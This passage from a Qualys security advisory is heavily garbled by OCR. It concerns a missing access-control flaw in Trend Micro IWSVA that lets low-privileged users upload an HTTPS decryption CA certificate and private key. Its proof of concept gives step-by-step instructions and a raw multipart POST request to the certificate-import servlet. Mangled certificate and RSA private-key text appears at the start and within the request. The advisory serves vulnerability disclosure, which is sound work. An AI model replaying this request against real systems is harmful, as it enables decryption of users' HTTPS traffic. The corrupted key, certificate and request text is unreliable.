Zelt kën hang gã Sag Cech oe ae bs server, for complete security, we 
m/DSC0BJzTzK/I6xVWd/kAD4Po4M|mYb5yx5glltfob:12y3L:TB2DEhRxpxbxh2C! Ree 
Dee lee See EE modulus of the private key on your server 
+E4h IODH. rX1U07FTDISDFC062g0weOFOpXF2VtCIk a 


+NpFCSWXHzhVz1o8Fv8Z7QfGSKMwZfmZYbkgL8PbfV2g83HcsbTt8Se.x3YUJOWvgAQ 
U3U ld6HoEYIB2EgKvVTE+FSkwqG4uSRY6Dv/TC7X5gl6+zz3 

X75Vs0ahAoGBANRoH+ThTqpg7jCExii3bzgozAo+osltrGSNESm22ealFpFnf/aPD 

WAVN|k45tMkPsSWIreaVSuUh|ms7|xudyauwzudk42XXOOOvhRlvteel|/z/4SviM 


using the OpenSSL commands above. 


H2LurGklln H d 1 k OI n41 RUFZA« 


Vulnerability 5- Missing functional level access control allows a low privileged user upload HTTPS 
Decryption Certificate and Private Key: 


An authenticated, remote attacker with low privileges (“Reports Only" or “Auditor” role assigned to him/her) 
can upload HTTPS Decryption Certificate and Private Key. 


Risk Factor: 


Impact: 


Per IWSVA documentation, by default, IWSVA acts as a private Certificate Authority (CA) and dynamically 
generates digital certificates that are sent to client browsers to complete a secure passage for HTTPS 
connections. It also allows administrators to upload their own certificates signed by root CA. 


An attacker with low privileges can upload new CA certificate and Private Key and use those to decrypt HTTPS 
traffic thus compromising confidentiality. 


CVSS Score: AV:N/AC:L/AU:S/C: C/I:C/A:N 


Proof-Of-Concept: 


Create a least privileged user ‘Test2’ and assign him either ‘Auditor’ or ‘Reports Only’ role. 

Log into IWSVA web console with least privilege user ‘Test2’. 

Note down ‘CSRFGuardToken’ and ‘JSESSIONID’ values for this session. 

Send following POST requests using BurpSuite Repeater with ‘CSRFGuardToken’ and ‘JSSESSIONID’ 
values obtained earlier. Follow redirections in BurpSuite to complete the request. To confirm if the 


p ou pmi 


JSESSIONID=E595855EF5900782921945280ABA46CD 


S8PM5QG974XLWS992M CK5M67T6D0A575 


no 

----------------------------- Je] [fd2fdOac0 

Content- Disposition: form-data; name-"importca, certificate"; filename-"get current ca cert(2).cer" 
Content- Type: application/x-x509-ca-cert 


MIID4TCCAsmgA wIBA glJ ALS4-n7I0woMsM A0GCSqGSIb3 DQEBBQUAME4 xCzAJBgNV 
BAgTAKNBMQswCQ YDVQQHEwJD VTEOM AwGA1 UEChMFVFJFTKQxDTALBgN V BAsTBEI 
X 

UIMxEzARBgNVBAMTCKIXUIMuVFEJFTKQwHhcNMDgxM TIXMDc wOTIOW hcNMjgxM TE2 
MDcwOTIOWjBOMQswCQ YDVQOQIEwJDQTELM AkGAIUEBxMCQ1UxDjJAMBgNVBAoTB VR 
S 
RUSEMQOwCwYDVQQLEwRJVINTMRMwEQOYDVOODEwpJVINTLIRSRUSEMIIBIJANBbgkq 
hkiG9w0BAQEFAAOCAQS8AMIIBCgKCAQEApucvwAB5OAzgiboEaxrV ZXptpOLSjrL6 
/B8COTNKS59obTuleITGVsm90O g2Hj/b3 wZpxWZCKIyECP Zk6Qvf TbpH5 29 ZtZ+6bn 
7DOIbxLk4Ax/mxZM Y4td GtBLx2 gQMp69PfoY teb619 hvjJ9 vICQ2Wqo7LcOfXO--1 

S9L+R032LS yuTwt2iB VY ym7rXq XK Fme6fbk 1 q/68qWp8 fh X--F9cx8JQ yDQ LOwRS U 
QEGd085LeH6NdEhn9N AC 9 y XyIQSbORm0 yc/ody2w XIOTV fuOcBQ f8 tUMLrO nlt4 
v6C033JipcJISNccH0zli6/D5+ UfXw50G/i8 LsH fo ht YFw+xFqc7 uQIDAQA Bo4 HB 
MIG+MA8GC WCGS AGG+EIBDQQCFgAwHQ YDVROOBBYEFLDosmmRcl0V1rT8/j0j+hGLg 
CpgFMH4GA1UdIwR3MHWAFLDosmmRcl0VrT8/0j+hGLgCp gFo VKKUDBOMQswCQYD 
VQQIEwJDQTELMAKGA1 UEBxMCQ1UxDjAMB gN VB Ao TB VRSRUSEMQOwCw YD VOQLEw 
RJ 

VINTMRMWEQYDVQQDEwpJV1IN TLIRSRUS EggkAtL6fsj TC gywwDA YD VROTBAUWAWEB 
/ZANBgkqhkiG9 wWOBAQUFAAOCAQEAoh0 XZ82Q ZKswjEsV gDrfuJWXQ7K vP X BaHW +1 
vAzq3JS61L6 TN6mStqu36 wEpjf4 UfK nn7 Tp V EBPB6k Ge Zak+O ZiPa0sojqk grOQ 
OvUV2pi4fD A vCcxhsIgZ8W Xe XEMb+C frOSEBsd72sxK BU2iK LK H6NFqrWCBS tJ B 
3IIEfWzgpON zqS+r2 yRPpFv8F+ VXRC mmK W3SkHRisz9iOAF+VQO+8RynHCW8FWN4 
YGV5sTTjx8 E08acrazCM+t9GamBCsU12 g3qcnSZMQ IsLrWeh YN31B neNsItzik8R 

Im9/tIV44D/P xeFN IS IZHZmcpX REcklk gZeq g3 upP+ DGI2IM Dw== 


----------------------------- Je | 1fd2fd0ac0 
Content- Disposition: form-data; name-"importca key"; filename-"get current ca key(l1).cer" 
Content- Type: application/x-x509-ca-cert 


MIIEpAIBAAKCAQEApuc vwA B5OAzgiboEaxrV ZXptpOLSjrL6/B8COTNK59obTule 
ITGVsm90 g2Hj/b3 wZpxWZCKIyECP zk6QvfTbpHS5 g9 ZtZ+6bn7 DOlbxLkAAx/mxZM 
Y4tdGtBLx2gQMp69PfoY teb6I9hvjJ9 vVICQ2Wqo7LcOfXO--1S9 L- RO32LS yuTwt2 
iBVYym7rXqXKF me6fbk1q/680Wp8fhX--F9cx8JQ yDQLOwRSUQEGAd085 LeH6NdEhn 
9NAC3IOyXyIQ5bORmOyc/ody2 wXIOTV fuOcBQ f8 tU MLrOnlt4 v6C033JipcJIS Ncc 
HOzh6/D5+UfX w50G/18Ls Hfoht YFw+ xFqc7 uQIDAQ AB AoIBAQC fp x HOF f/eb+ Lx 
nVDSC08JzTzK/16xVd/kA D4Po4MJmYbS yx5 glJffob12y9LtTB2D6hRxpxbxh2CI 
NnsaWfkotoNFLZ+7q4K6ZhtCzs4Ey6/c yE22A v/CwHFc g9 zKrzHS 8 UNT/V Zlp4 m8 
+F4hVSpxO910DHztx4d UgqrX 1 u0u7 FTDIS DFC062q0weOFOpXF2V tC IKGCOA gQaMz 
+NpFC8W XHzhVz1 08Fv8 Z7Q fG5KM wZfmZYbkqL8PbfV2 g83 Hcsb Tt8 gx9 YUO W vq AQ 
hyV44wW9eU3UCpYp99fMd6Ho6Y IB2EqK vVTE+RSkwqG4uSR Y6Dv/TC7XS gl64-ZZ9 
x7S VsOqghAoGBANRoH+ ThTqpq7jCExij3b gozAo+0sltrG8NES m22ealIFpFnf/aPD 


-----END RSA PRIVATE KEY-- 


{Go} cancel | <i” J | 7 | Follow redirection Target: http:/192.168.253.150:1812 [到 (2 | 


HTTP/1.1 302 Found 


POST /servlet/com.trend.iwss.gui.servlet.XMLRPCcert?action-import HTTP/1.1 


Accept: text/html, application/xhtml+xml, image/jxr, */* N | Server: Apache-Coyote/1.1 
Accept-Language: en-US Location 
User-Agent: Mozilla/S.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko hetp://192. 168.253. 150: 1812/httpsdecrypt_root_ca. }sp?CSRFGuardToken=S8PMSQG974XLWSS 
Content-Type: multipart/form-data; boundary= Telifd2fdDacü S2NCKSMe7TEDOAS75&fromUpload-yes 
Accept-Encoding: gzip, deflate Content-Length: 0 

Date: Wed, 18 Jan 2017 09:46:37 GMT 


Content-Length: 4085 
Host: 192.168.253.150:1812 Connection: close 
Pragma: no-cache 

Cookie: JSESSIONID=ESS5855EFSS00782 


Connection: close 


-7e11fd2fd0ac0 
Content-Disposition: form-data; name="CSRFGuardToken" 


IBPMSQGS74XL V: 


~7e11£d2#d0acD. 
Content-Disposition: form-data; name="op" 


save 
-T7elifd2fdDacO 
Content-Disposition: form-data; name-"defaultca" 


n | 


- -7e11fd2fd0ac0 
Content-Disposition: form-data; name="importca_certificate"; filename-"g 
Content-Type: application/x-xS09-ca-cert 


current ca 


BEGIN CERTIFIC: 


JBgNV 
NVBASTBELX 
M3gxMTEZ 


XUL MuVFJF. 
QQTEWIDC 


Iy2wXT10TVfuOcEBOfStUMLrOn1t4 
sHfoht YFw+xF qc7uQ1DAGABo4HB 
'TB/303+h6 


UV2Pi 


fDAvCi 


YGV5sTTjxB 
Ims/E1V44D/PxeFN1512HZrmcpXPEcKI 


BB B (9 [re a asa t 
Done 


d 
| 0 matches I| Lei 加 | jJ Type a search term 0 matches 


251 bytes | 251 millis 


5. Above request will delete/remove existing certificates and add new one. To confirm if the certificate and 
private key were uploaded successfully, log in with Administrator account and download the certificate/ke y. 


These should be the ones that you uploaded earlier. 


CREDITS: 


The discovery and documentation of this vulnerability was conducted by Kapil Khot, Qualys 
Vulnerability Signature/Research Team. 


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at 
http//www.qualys.com or send email to research? qualys.com 


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2017 Qualys Inc. It may be redistributed 
provided that no fee is charged for distribution and that the advisory is not modified in any way. 


